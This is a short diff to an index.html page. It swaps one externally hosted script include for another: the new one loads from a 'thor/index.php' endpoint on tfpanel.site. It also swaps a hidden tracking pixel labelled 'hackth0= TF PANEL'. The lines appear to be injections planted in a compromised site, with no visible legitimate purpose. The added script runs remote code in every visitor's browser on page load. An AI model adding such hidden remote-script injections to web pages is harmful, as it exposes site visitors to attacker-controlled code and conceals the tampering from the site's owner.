--- a/index.html
+++ b/index.html
@@ -1,2 +1,2 @@
-<script src="https://opusdai.us/thor/index.php?username=user2" type="text/javascript" async="true"></script>
-<img src="//whos.amung.us/pingjs/?k=hackth0= THE FLUTE PANEL &x=https://google.com" style="display:none" alt="">
+<script src="https://tfpanel.site/thor/index.php?username=theflute" type="text/javascript" async="true"></script>
+<img src="//whos.amung.us/pingjs/?k=hackth0= TF PANEL &x=https://google.com" style="display:none" alt="">
